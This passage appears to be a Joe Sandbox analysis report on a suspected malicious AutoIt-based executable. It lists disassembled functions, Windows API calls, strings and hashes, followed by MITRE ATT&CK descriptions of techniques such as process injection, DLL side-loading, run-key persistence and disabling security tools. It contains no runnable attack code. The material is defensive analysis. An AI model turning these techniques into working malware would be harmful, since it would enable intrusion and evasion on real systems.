InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 009FCDA6

Strings

<local>, xrefs: 009FCD66

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 057ec3b8073849f731d6b4b0a208deb20beadf58560fde38f88286f6ee313746
Instruction ID: 9d54fcc444e37f216cab22bd51c3fc00645af49f46961c06e89a7bc60d46388d
Opcode Fuzzy Hash: 057ec3b8073849f731d6b4b0a208deb20beadf58560fde38f88286f6ee313746
Instruction Fuzzy Hash: 7A11A3B524563DBAD7244A668C45EFBBEADEF127B4F008626B219920C0D6749841D7F0

Uniqueness

Uniqueness Score: -1.00%

Function 00A13429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00A134AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00A134BA

Strings

edit, xrefs: 00A1348F

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 31f0719081022c01010433ec4ae8c57c9caae3452325f1e27e171e7918b0996f
Instruction ID: 6cb7b416d82ca2fbc3d78acd288e5bc75a6d0053759e0e4cbca89968dbf1c57a
Opcode Fuzzy Hash: 31f0719081022c01010433ec4ae8c57c9caae3452325f1e27e171e7918b0996f
Instruction Fuzzy Hash: C211BC72100208AFEF228FA4DC80AFB37AAEB14375F504324FA61931E0C735DC919B60

Uniqueness

Uniqueness Score: -1.00%

Function 009E6C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD

CharUpperBuffW.USER32(?,?,?), ref: 009E6CB6
_wcslen.LIBCMT ref: 009E6CC2

Strings

STOP, xrefs: 009E6CBC, 009E6CC1

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 946602ac946db867b2eb9aab9a792f9fd85efbba3fa5b306b81eb30fb4dd7b84
Instruction ID: 5141165263fd9d9cbdb1a0adc4ed5c898c555f6d03d0cf5778f137270389eaed
Opcode Fuzzy Hash: 946602ac946db867b2eb9aab9a792f9fd85efbba3fa5b306b81eb30fb4dd7b84
Instruction Fuzzy Hash: 4C0108326005668BCB12AFBECC409BF73A9FBB17907500924E59296191EB35DD40C750

Uniqueness

Uniqueness Score: -1.00%

Function 009E1CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD

Part of subcall function 009E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 009E3CCA

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 009E1D4C

Strings

ComboBox, xrefs: 009E1CEB
ListBox, xrefs: 009E1D16

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 13696900de4357e6183eff7d274a3bb0ca4074fe5cd77c4c3c0960b2f197b165
Instruction ID: 559968b71f1478cbc44710542eb9387b000dcde406864c5cb912d05a07cc53bd
Opcode Fuzzy Hash: 13696900de4357e6183eff7d274a3bb0ca4074fe5cd77c4c3c0960b2f197b165
Instruction Fuzzy Hash: 08014C35601218ABCB09FBA0CC15DFE73A8FF82350B144909F873673C1EA355D488760

Uniqueness

Uniqueness Score: -1.00%

Function 009E1BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD

Part of subcall function 009E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 009E3CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 009E1C46

Strings

ComboBox, xrefs: 009E1BE5
ListBox, xrefs: 009E1C10

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 7aacff71a038eb6fb16d59b0b8c05e97fac6fe9d416232b36e842a8e169e5d3c
Instruction ID: fa9e37dabf3401637e5912fc88b9e285e3ea2d571e89f712f7e146dfd4786f03
Opcode Fuzzy Hash: 7aacff71a038eb6fb16d59b0b8c05e97fac6fe9d416232b36e842a8e169e5d3c
Instruction Fuzzy Hash: C401A775B811446BCB05FBA1C956AFF77AC9B91340F240419B896B7282EA35DE0887B1

Uniqueness

Uniqueness Score: -1.00%

Function 009E1C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD

Part of subcall function 009E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 009E3CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 009E1CC8

Strings

ComboBox, xrefs: 009E1C69
ListBox, xrefs: 009E1C94

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 568958d1cbba6def9e44f3c83d0719d1f60de93cd65d49000d08bad516753ab5
Instruction ID: e5de1a36ea898e03625c84afe2964dedcc3ce1c842e008f8ed43f63c861c200f
Opcode Fuzzy Hash: 568958d1cbba6def9e44f3c83d0719d1f60de93cd65d49000d08bad516753ab5
Instruction Fuzzy Hash: 2501D675A8115867CB06FBA1CA05BFE73ACAB51340F244415B886B3282FA359F09C771

Uniqueness

Uniqueness Score: -1.00%

Function 009E1D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD

Part of subcall function 009E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 009E3CCA

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 009E1DD3

Strings

ComboBox, xrefs: 009E1D75
ListBox, xrefs: 009E1DA0

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: fcc6ad2686ec9aeb2872207d3e7cdab3a15352145755b4e2e52bce1bb5f21dcd
Instruction ID: c74acdc6b179fb066734a75a9677ee1fbdccf5b3e5afcbcb56d0de82e07bf040
Opcode Fuzzy Hash: fcc6ad2686ec9aeb2872207d3e7cdab3a15352145755b4e2e52bce1bb5f21dcd
Instruction Fuzzy Hash: 13F0FF71A412186BCB05F7A5CC56BFE73ACAB82350F080D19B862632C2EA759E088360

Uniqueness

Uniqueness Score: -1.00%

Function 00A0747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00A07493
_wcslen.LIBCMT ref: 00A074B9

Strings

3, 3, 16, 1, xrefs: 00A07483

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: da22ab3f3bcbc2c1f107a8556166e2c2d92ba3c33675a181932deded0f5ffb91
Instruction ID: e6ebf7f3f18c8586d9e101c708f2ea7bd6c6b8fbfd3f707f97e23efb7ee615a6
Opcode Fuzzy Hash: da22ab3f3bcbc2c1f107a8556166e2c2d92ba3c33675a181932deded0f5ffb91
Instruction Fuzzy Hash: 3DE02B06A0426020D2311779BCC1A7F968DDFC6B90710182BF981C62A6EAE59DA193E1

Uniqueness

Uniqueness Score: -1.00%

Function 009E0B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 009E0B23

Strings

Error allocating memory., xrefs: 009E0B1C
AutoIt, xrefs: 009E0B17

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: d4e3cf9945011ed5b225d462803c810e8dc7f7f17b80697e59d9e7e298577be6
Instruction ID: 413addb2a7eb41789ccd7191bedac04940ff64777cc97fb06feae53a7b8a3071
Opcode Fuzzy Hash: d4e3cf9945011ed5b225d462803c810e8dc7f7f17b80697e59d9e7e298577be6
Instruction Fuzzy Hash: ECE0483528431837D61436957C03FC9BA899F46F61F204426F798955C38BD268D046E9

Uniqueness

Uniqueness Score: -1.00%

Function 009A0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0099F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,009A0D71,?,?,?,0098100A), ref: 0099F7CE

IsDebuggerPresent.KERNEL32(?,?,?,0098100A), ref: 009A0D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0098100A), ref: 009A0D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 009A0D7F

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: cfca32d5fcf74e3c23eec205faf79a4394f0ef263544e519ada15106ebedda12
Instruction ID: 996ad6aa05a0780af460ff6faea6e99afe08ee884a56d076e3b5a1bc4bcaa9d0
Opcode Fuzzy Hash: cfca32d5fcf74e3c23eec205faf79a4394f0ef263544e519ada15106ebedda12
Instruction Fuzzy Hash: 77E06D742007418FD370EFB8D4083967BE4BB41750F00892DE486C6691DBB5E4898BD1

Uniqueness

Uniqueness Score: -1.00%

Function 009DD21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 009DD220

Strings

X64, xrefs: 009DD2A8
%.3d, xrefs: 009DD22B

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 4a36c87842faa10372e9a8e45bfb4089f14d5c383fe6eb3e6f6d138c514dc721
Instruction ID: aa5e9a92214382bab3c297f72aaa409282226908dfb45ec5f8b943dca1c180c6
Opcode Fuzzy Hash: 4a36c87842faa10372e9a8e45bfb4089f14d5c383fe6eb3e6f6d138c514dc721
Instruction Fuzzy Hash: 6FD012A588A108FACF509AD0DC459F9B37CBB58341F50CC53FA16E2140D63CD509A761

Uniqueness

Uniqueness Score: -1.00%

Function 00A12322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A1232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00A1233F

Part of subcall function 009EE97B: Sleep.KERNEL32 ref: 009EE9F3

Strings

Shell_TrayWnd, xrefs: 00A12325

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: ec4840a08b71d37bdc0d453fa15933740351100b2354408b3f9395a56d1b1c4a
Instruction ID: 0f009ad5730e349dc4d0de18ffbf45ecc83de8fbde4da0d3e3f73832867fd680
Opcode Fuzzy Hash: ec4840a08b71d37bdc0d453fa15933740351100b2354408b3f9395a56d1b1c4a
Instruction Fuzzy Hash: 4CD022363C0300BBE264F3B0DC0FFC6BA05AB40B20F0089027305AA0D0C8F4A802CA04

Uniqueness

Uniqueness Score: -1.00%

Function 00A12356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A1236C
PostMessageW.USER32(00000000), ref: 00A12373

Part of subcall function 009EE97B: Sleep.KERNEL32 ref: 009EE9F3

Strings

Shell_TrayWnd, xrefs: 00A12365

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: a2464e8656ab0cb8d2aff4a53203c5ecd4f30c575dfc267a93c71999e671ab1f
Instruction ID: 396bf07dc02132c0bd956e1f0f84811879bb756fc25d4b72a9b06fdd58061543
Opcode Fuzzy Hash: a2464e8656ab0cb8d2aff4a53203c5ecd4f30c575dfc267a93c71999e671ab1f
Instruction Fuzzy Hash: 13D022323C03007BE264F3B0DC0FFC6B605AB40B20F0089027301EA0D0C8F4B802CA08

Uniqueness

Uniqueness Score: -1.00%

Function 009BBDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 009BBE93
GetLastError.KERNEL32 ref: 009BBEA1
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 009BBEFC

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 60633dedce710f7da0d3e7682e85ddef7226f356d7d58af127a6bd8a4b718992
Instruction ID: c2a6e86a8bde627e5f41c6819e90b7fa9cacdf4f1e130173a08f2d5595f02957
Opcode Fuzzy Hash: 60633dedce710f7da0d3e7682e85ddef7226f356d7d58af127a6bd8a4b718992
Instruction Fuzzy Hash: 45410A34600206AFCF219FA4CE54BFABBA9EF42730F144169F9599B1E1DBB08D01CB90

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

